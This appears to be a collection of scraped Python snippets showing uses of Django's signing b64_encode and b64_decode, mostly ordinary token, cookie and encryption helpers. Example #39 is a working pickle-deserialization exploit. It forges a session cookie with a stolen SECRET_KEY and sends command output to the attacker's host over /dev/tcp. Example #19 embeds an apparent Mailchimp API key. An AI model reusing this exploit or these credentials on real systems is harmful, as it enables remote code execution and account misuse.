Example #1
0
    def get(self, request):
        try:
            tk = request.GET.get('gtk')
            if tk != '5c9bad6ae8d8431eb3148d92f4b042e1':
                return JsonResponse({"Error": 'false', 'Msg': '校验错误, 请传入正确参数'}, safe=False)
            else:
                req = Token.objects.get(id=1).token
                ponged = signing.b64_encode(req.encode()).decode()
                query_data = signing.b64_encode(ponged.encode()).decode()
                return JsonResponse({"statue": 'success', 'data': query_data}, safe=False)
        except Exception as e:
            return JsonResponse({"statue": 'false', 'msg': str(e)}, safe=False)

    # '''校验token'''  # Y21GbGFXRnNabXBrYTNOc1ptRnFaSE5yYkdacQ
    # def post(self, request):
    #     try:
    #         # tk = request.META['TOKEN']
    #         tk = request.POST.get('TOKEN')
    #         src = signing.b64_decode(tk.encode()).decode()
    #         dat = signing.b64_decode(src.encode()).decode()
    #         # print(dat)
    #         stk = Token.objects.get(id=1).token
    #         # print(stk)
    #         if dat != stk:
    #             return JsonResponse({"Error": 'false', 'Msg': False}, safe=False)
    #         else:
    #             return JsonResponse({"Error": 'success', 'Msg': True}, safe=False)
    #     except Exception as e:
    #         return JsonResponse({"statue": 'false', 'msg': e}, safe=False)
Example #2
0
def set_express_session(resp, session_dict, cookie_name='express_sess'):
    """
    Set express session cookie that express can parse.

    nearly got it. but django adds quotes around the cookie value. will have to fix in express.
    """
    key = settings.SECRET_KEY
    cookie_value = base64.b64encode(
        unicode(json.dumps(session_dict, separators=(',', ':'))))
    cookie = cookie_name + '=' + cookie_value

    hmac = Hmac.new(key, cookie, hashlib.sha1)
    cookie_sig = signing.b64_encode(hmac.digest())
    resp.set_cookie(cookie_name,
                    value=cookie_value,
                    max_age=None,
                    expires=None,
                    secure=None,
                    httponly=True)
    resp.set_cookie(cookie_name + '.sig',
                    value=cookie_sig,
                    max_age=None,
                    expires=None,
                    secure=None,
                    httponly=True)
Example #3
0
def get_express_session(req, cookie_name='express_sess'):
    """
    get the Express.js session dict. 

    default session cookie name of express:sess does now work with django.
    """
    key = settings.SECRET_KEY
    cookie_value = req.COOKIES.get(cookie_name)
    cookie_sig = req.COOKIES.get(cookie_name + '.sig')
    if not cookie_value or not cookie_sig:
        return {}

    cookie = cookie_name + '=' + cookie_value
    hmac = Hmac.new(key, cookie, hashlib.sha1)
    digest = signing.b64_encode(hmac.digest())
    valid_sig = crypto.constant_time_compare(digest, cookie_sig)
    if not valid_sig:
        return {}

    try:
        json_data = signing.b64_decode(cookie_value)
        session = json.loads(json_data)
    except:
        return {}
    return session
Example #4
0
    def sign(self, data):
        """
        Create an URL-safe, signed token from ``data``.

        """
        data = signing.b64_encode(data).decode()
        return self.signer.sign(data)
Example #5
0
def get_express_session(req, cookie_name='express_sess'):
    """
    get the Express.js session dict. 

    default session cookie name of express:sess does now work with django.
    """
    key = settings.SECRET_KEY
    cookie_value = req.COOKIES.get(cookie_name)
    cookie_sig = req.COOKIES.get(cookie_name + '.sig')
    if not cookie_value or not cookie_sig:
        return {}

    cookie = cookie_name + '=' + cookie_value
    hmac = Hmac.new(key, cookie, hashlib.sha1)
    digest = signing.b64_encode(hmac.digest())
    valid_sig = crypto.constant_time_compare(digest, cookie_sig)
    if not valid_sig:
        return {}

    try:
        json_data = signing.b64_decode(cookie_value)
        session = json.loads(json_data)
    except:
        return {}
    return session
Example #6
0
    def test_naive_token_hijacking_fails(self):
        # The revocation key may be identical for two users:
        # - if SESAME_INVALIDATE_ON_PASSWORD_CHANGE is False or if they don't
        #   have a password;
        # - if SESAME_ONE_TIME is False or if they have the same last_login.
        # In that case, could one user could impersonate the other?
        user1 = self.user
        user2 = self.create_user("jane")

        token1 = create_token(user1)
        token2 = create_token(user2)

        # Check that the test scenario produces identical revocation keys.
        # This test depends on the implementation of django.core.signing;
        # however, the format of tokens must be stable to keep them valid.
        data1, sig1 = token1.split(":", 1)
        data2, sig2 = token2.split(":", 1)
        data1 = signing.b64_decode(data1.encode())
        data2 = signing.b64_decode(data2.encode())
        pk1 = packers.packer.pack_pk(user1.pk)
        pk2 = packers.packer.pack_pk(user2.pk)
        self.assertEqual(data1[: len(pk1)], pk1)
        self.assertEqual(data2[: len(pk2)], pk2)
        key1 = data1[len(pk1) :]
        key2 = data2[len(pk2) :]
        self.assertEqual(key1, key2)

        # Check that changing just the primary key doesn't allow hijacking the
        # other user's account.
        data = pk2 + key1
        data = signing.b64_encode(data).decode()
        token = data + sig1
        user = parse_token(token, self.get_user)
        self.assertIsNone(user)
        self.assertLogsContain("Bad token")
Example #7
0
def dumps(obj,
          key=None,
          salt='django.core.signing',
          serializer=JSONSerializer,
          compress=False):
    """
    Returns URL-safe, sha1 signed base64 compressed JSON string. If key is
    None, settings.SECRET_KEY is used instead.

    If compress is True (not the default) checks if compressing using zlib can
    save some space. Prepends a '.' to signify compression. This is included
    in the signature, to protect against zip bombs.

    Salt can be used to namespace the hash, so that a signed string is
    only valid for a given namespace. Leaving this at the default
    value or re-using a salt value across different parts of your
    application without good cause is a security risk.

    The serializer is expected to return a bytestring.
    """
    data = serializer().dumps(obj)

    # Flag for if it's been compressed or not
    is_compressed = False

    if compress:
        # Avoid zlib dependency unless compress is being used
        compressed = zlib.compress(data)
        if len(compressed) < (len(data) - 1):
            data = compressed
            is_compressed = True
    base64d = b64_encode(data)
    if is_compressed:
        base64d = b'.' + base64d
    return TimestampSigner(key, salt=salt).sign(base64d)
Example #8
0
    def sign(self, data):
        """
        Create an URL-safe, signed token from `data`.

        """
        data = signing.b64_encode(data).decode()
        return self.signer.sign(data)
def dumps(obj, key=None, salt='django.core.signing', serializer=JSONSerializer, compress=False):
    """
    Returns URL-safe, sha1 signed base64 compressed JSON string. If key is
    None, settings.CRYPTOGRAPHY_SIGNINGKEY is used instead.

    If compress is True (not the default) checks if compressing using zlib can
    save some space. Prepends a '.' to signify compression. This is included
    in the signature, to protect against zip bombs.

    Salt can be used to namespace the hash, so that a signed string is
    only valid for a given namespace. Leaving this at the default
    value or re-using a salt value across different parts of your
    application without good cause is a security risk.

    The serializer is expected to return a bytestring.
    """
    data = serializer().dumps(obj)

    # Flag for if it's been compressed or not
    is_compressed = False

    if compress:
        # Avoid zlib dependency unless compress is being used
        compressed = zlib.compress(data)
        if len(compressed) < (len(data) - 1):
            data = compressed
            is_compressed = True
    base64d = b64_encode(data)
    if is_compressed:
        base64d = b'.' + base64d
    return TimestampSigner(key, salt=salt).sign(base64d)
Example #10
0
    def generate_token(self):
        # Inspired by: https://github.com/aaugustin/django-sesame/

        raw_token = struct.pack(
            str("!i"), self.invited_user.pk) + crypto.pbkdf2(
                self.invited_user.email, "radiologo", 10000)
        url_ready_token = signing.TimestampSigner(salt="radiologo").sign(
            signing.b64_encode(raw_token).decode())
        self.sent_token = url_ready_token
        return url_ready_token
Example #11
0
def serialize_and_sign(payload, salt, compress=False):
    data = signing.JSONSerializer().dumps(payload)

    prefix = ""

    if compress:
        compressed = zlib.compress(data, 9)
        if len(compressed) < (len(data) - 1):  # Only use the compressed version if it's actually smaller
            data = compressed
            prefix = "."
    encoded = prefix + signing.b64_encode(data)
    return signing.Signer(None, salt=salt).sign(encoded)
Example #12
0
 def _get_val():
     token = get_token(request)
     if token is None:
         # In order to be able to provide debugging info in the
         # case of misconfiguration, we use a sentinel value
         # instead of returning an empty dict.
         return 'NOTPROVIDED'
     else:
         token = force_bytes(token, encoding='latin-1')
         key = force_bytes(get_random_string(len(token)),
                           encoding='latin-1')
         value = b64_encode(xor(token, key))
         return force_text(b'$'.join((key, value)), encoding='latin-1')
Example #13
0
def token_encode(content_type_id, object_id):
    """
    Encodes the content_type_id and object_id values into a packed string.
    """
    data = struct.pack('!QQ', content_type_id, object_id)

    # Set content_type_id and object_id
    content_type_id = data[:8].lstrip('\0')
    object_id = data[8:].lstrip('\0')

    # Set the size of our values
    size = struct.pack('!B', len(content_type_id) << 4 | len(object_id))

    return b64_encode(size + content_type_id + object_id)
Example #14
0
def set_express_session(resp, session_dict, cookie_name='express_sess'):
    """
    Set express session cookie that express can parse.

    nearly got it. but django adds quotes around the cookie value. will have to fix in express.
    """
    key = settings.SECRET_KEY
    cookie_value = base64.b64encode(unicode(json.dumps(session_dict, separators=(',', ':'))))
    cookie = cookie_name + '=' + cookie_value

    hmac = Hmac.new(key, cookie, hashlib.sha1)
    cookie_sig =  signing.b64_encode(hmac.digest())
    resp.set_cookie(cookie_name, value=cookie_value, max_age=None, expires=None, secure=None, httponly=True)
    resp.set_cookie(cookie_name + '.sig', value=cookie_sig, max_age=None, expires=None, secure=None, httponly=True)
 def _get_val():
     token = get_token(request)
     if token is None:
         # In order to be able to provide debugging info in the
         # case of misconfiguration, we use a sentinel value
         # instead of returning an empty dict.
         return 'NOTPROVIDED'
     else:
         token = force_bytes(token, encoding='latin-1')
         key = force_bytes(
             get_random_string(len(token)),
             encoding='latin-1'
         )
         value = b64_encode(xor(token, key))
         return force_text(b'$'.join((key, value)), encoding='latin-1')
def new_temporary_file(filename, mimetype, prefix=''):
    dir = secure_join(settings.MEDIA_ROOT, 'temporary')
    if not os.path.exists(dir):
        os.makedirs(dir)
    f = NamedTemporaryFile(
        mode='wb',
        prefix=prefix,
        suffix=os.path.splitext(filename)[1],
        delete=False,
        dir=dir)
    CleanupTemporary().apply_async((f.name,), countdown=TEMPORARY_FILE_TTL)
    signer = TimestampSigner(sep=':')
    url = reverse('filesystem-temporary-download', kwargs={
        'token': signer.sign(b64_encode('%s,%s,%s' % (os.path.basename(f.name), filename, mimetype))),
        'filename': filename,
    })
    return f, url
Example #17
0
def new_temporary_file(filename, mimetype, prefix=''):
    dir = secure_join(settings.MEDIA_ROOT, 'temporary')
    if not os.path.exists(dir):
        os.makedirs(dir)
    f = NamedTemporaryFile(
        mode='wb',
        prefix=prefix,
        suffix=os.path.splitext(filename)[1],
        delete=False,
        dir=dir)
    CleanupTemporary().apply_async((f.name,), countdown=TEMPORARY_FILE_TTL)
    signer = TimestampSigner(sep=':')
    url = reverse('filesystem-temporary-download', kwargs={
        'token': signer.sign(
            b64_encode('%s,%s,%s' % (
                os.path.basename(f.name), filename, mimetype))),
        'filename': filename,
    })
    return f, url
Example #18
0
    def test_naive_token_hijacking_fails(self):
        # Tokens contain the PK of the user, the hash of the revocation key,
        # and a signature. The revocation key may be identical for two users:
        # - if SESAME_INVALIDATE_ON_PASSWORD_CHANGE is False or if they don't
        #   have a password;
        # - if SESAME_ONE_TIME is False or if they have the same last_login.
        User = get_user_model()
        last_login = timezone.now() - datetime.timedelta(3600)
        user_1 = User.objects.create(username="******", last_login=last_login,)
        user_2 = User.objects.create(username="******", last_login=last_login,)

        token1 = self.backend.create_token(user_1)
        token2 = self.backend.create_token(user_2)
        self.backend.unsign(token1)
        self.backend.unsign(token2)

        # Check that the test scenario produces identical revocation keys.
        # This test depends on the implementation of django.core.signing;
        # however, the format of tokens must be stable to keep them valid.
        data1, sig1 = token1.split(self.backend.signer.sep, 1)
        data2, sig2 = token2.split(self.backend.signer.sep, 1)
        bin_data1 = signing.b64_decode(data1.encode())
        bin_data2 = signing.b64_decode(data2.encode())
        pk1 = self.backend.packer.pack_pk(user_1.pk)
        pk2 = self.backend.packer.pack_pk(user_2.pk)
        self.assertEqual(bin_data1[: len(pk1)], pk1)
        self.assertEqual(bin_data2[: len(pk2)], pk2)
        key1 = bin_data1[len(pk1) :]
        key2 = bin_data2[len(pk2) :]
        self.assertEqual(key1, key2)

        # Check that changing just the PK doesn't allow hijacking the other
        # user's account -- because the PK is included in the signature.
        bin_data = pk2 + key1
        data = signing.b64_encode(bin_data).decode()
        token = data + sig1
        user = self.backend.parse_token(token)
        self.assertEqual(user, None)
        self.assertIn("Bad token", self.get_log())
def register_user_mailchimp(list_id, email, resort_name, first_name, last_name,
                            interest_list):
    http = urllib3.PoolManager()
    url = 'https://us3.api.mailchimp.com/3.0/lists/%s/members' % list_id
    data = {
        "email_address": email,
        "status": "pending",
        "email_type": "html",
        "merge_fields": {
            "FNAME": first_name,
            "LNAME": last_name,
            "RESORT": resort_name
        },
        "interests": {key: True
                      for key in interest_list}
    }
    headers = {
        "Authorization":
        "Basic %s" % b64_encode("duncan:bf9fa3e09972580b286d55ed5edd6a02-us3"),
        "Content-Type":
        "application/json"
    }
    r = http.request('POST', url, headers=headers, body=json.dumps(data))
Example #20
0
 def jia_mi(self, cls):  #加密
     value = signing.dumps(cls, key=self.KEY, salt=self.SALT)
     mima = signing.b64_encode(value.encode()).decode()
     return mima
Example #21
0
    def test_bogus(self):
        t = b64_encode(b"random")

        resp = self.client.get("/admin/", HTTP_X_AUTH_TOKEN=t)
        self.assertRedirects(resp, "/admin/login/?next=/admin/")
def base64_hmac(salt, value, key):
    return b64_encode(salted_hmac(salt, value, key).finalize())
Example #23
0
 def dumps(self, obj):
     data = json.dumps(obj, separators=(',', ':'),
                       sort_keys=True).encode('utf-8')
     base64d = signing.b64_encode(data)
     return signing.Signer(salt=self.salt).sign(base64d)
Example #24
0
    def test_get_verification_code(self):
        signer = TimestampSigner()
        code = b64_encode(bytes(signer.sign(TEST_EMAIL), encoding='utf-8'))

        nt.assert_equal(self.user.get_verification_code(TEST_EMAIL), code)
Example #25
0
def encrypt(obj):
    """加密"""
    value = signing.dumps(obj, key=KEY, salt=SALT)
    value = signing.b64_encode(value.encode()).decode()
    return value
def my_encode_token(pk, role, password):
    # id+空格+role+空格+password+空格+时间进行加密
    return signing.b64_encode((str(pk) + " " + str(role) + " " + password +
                               " " + str(time.time())).encode()).decode()
Example #27
0
def encrypt(obj):
    """加密"""
    value = signing.dumps(obj, key='liming', salt='www.gongliming.com')
    value = signing.b64_encode(value.encode()).decode()
    return value
Example #28
0
def base64_hmac(salt, value, key):
    return b64_encode(salted_hmac(salt, value, key).finalize())
Example #29
0
def encrypt(obj):
    """加密"""
    enStr = signing.dumps(obj, key=KEY, salt=SALT)
    enStr64 = signing.b64_encode(enStr.encode()).decode()
    # print(enStr64)
    return enStr64
Example #30
0
def Encrypt(value):
    data = signing.dumps(value)
    data = signing.b64_encode(data.encode()).decode()
    return data
Example #31
0
def create_crypted_challenge():
    challenge = get_random_string(CAPTCHA_LENGTH, CAPTCHA_CHARS)
    return b64_encode(crypto_data.encrypt(challenge, CAPTCHA_AGE))
 def get_verification_code(self, email):
     # verification token 
     signer = TimestampSigner()
     return b64_encode(bytes(signer.sign(email), encoding='utf-8'))
def my_encode(value):
    return signing.b64_encode(value.encode()).decode()
Example #34
0
def enqueue(request, task, *args, **kwargs):
    status = task.delay(*args, **kwargs)
    signer = TimestampSigner(key=request.session.session_key, sep=':')
    return signer.sign(b64_encode(status.id))
def enqueue(request, task, *args, **kwargs):
    result = task.delay(language=get_language(), *args, **kwargs)
    signer = TimestampSigner(key=request.session.session_key, sep=':')
    return signer.sign(b64_encode(result.id))
Example #36
0
 def dumps(self, obj):
     data = json.dumps(
         obj, separators=(',', ':'), sort_keys=True).encode('utf-8')
     base64d = signing.b64_encode(data)
     return signing.Signer(salt=self.salt).sign(base64d)
Example #37
0
def encrypt(obj):
    value=signing.dumps(obj,key=settings.key,salt=settings.salt)
    value=signing.b64_encode(value.encode()).decode()
    return value
Example #38
0
	def encrypt(self, obj):
		value = signing.dumps(obj, key=self.KEY, salt=self.SALT)
		value = signing.b64_encode(value.encode()).decode()
		return value
Example #39
0
djpath = filter(lambda x:"PWD" == x[:3], environ.split("\x00"))[0].split("=")[1]

appname = djpath[djpath.rindex("/")+1:]
djbsettings = readfile(djpath + "/" + appname + "/settings.py")
#LOL YES I KNOW, but I wrote the code and I know it doesn't do malicious things here
exec(filter(lambda x:"SECRET_KEY" in x, djbsettings.split("\n"))[0])
exec(filter(lambda x:"SESSION_ENGINE" in x, djbsettings.split("\n"))[0])

import django.core.signing as d

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
port = random.randint(9000,65000)
s.bind(('0.0.0.0',port))
print "listening on %d"%port
s.listen(5)

pdata = "cos\nsystem\n(S'%s'\ntR." % (" bash -c 'cd /home/reekee/; ./give_me_the_flag.exe > /dev/tcp/%s/%d' "%(MYIP,port))
t = d.TimestampSigner(SECRET_KEY, salt=SESSION_ENGINE).sign(d.b64_encode(pdata))
print t
br = mechanize.Browser()
br.open(HOST)
br.set_cookie("sessionid="+t+";")
try:
  br.open(HOST)
except:
  pass
client, addr = s.accept()
print addr
print client.recv(1024)

Example #40
0
def enqueue(request, task, *args, **kwargs):
    status = task.delay(*args, **kwargs)
    signer = TimestampSigner(key=request.session.session_key, sep=':')
    return signer.sign(b64_encode(status.id))
Example #41
0
def enqueue(request, task, *args, **kwargs):
    result = task.delay(language=get_language(), *args, **kwargs)
    signer = TimestampSigner(key=request.session.session_key, sep=':')
    return signer.sign(b64_encode(result.id))
Example #42
0
def encrypt(rvalue):
    value = signing.dumps(rvalue, key=KEY, salt=SALT)
    value = signing.b64_encode(value.encode()).decode()
    return value
Example #43
0
def encrypt(obj):
    """加密"""
    # salt给生成的签名加盐,进行解码的时候使用
    value = signing.dumps(obj, key=KEY, salt=SALT)
    value = signing.b64_encode(value.encode()).decode()
    return value
Example #44
0
def _sign(obj):
    json = signing.JSONSerializer().dumps(obj)
    data = signing.b64_encode(json)
    return _signer.sign(data)